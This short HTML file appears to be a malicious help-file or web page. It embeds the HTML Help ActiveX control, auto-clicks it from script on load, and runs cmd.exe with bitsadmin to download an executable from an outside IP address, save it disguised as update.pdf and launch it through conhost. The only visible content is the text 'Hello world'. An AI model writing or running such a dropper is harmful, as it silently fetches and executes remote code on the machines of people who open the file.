<html>

<head></head>

<body>
    <object id=HiCrt classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
        <param name="Command" value="ShortCut">
        <param name="Button" value="Bitmap::shortcut">
        <param name="Item1" value=',cmd.exe,/c bitsadmin /transfer test /download /priority normal http://192.168.174.151/update.exe C:\Users\Public\update.pdf && conhost C:\Users\Public\update.pdf'>
        <param name="Item2" value="273,1,1">
    </object>
    <script>
        HiCrt.Click();
    </script>

    Hello world

</body>

</html>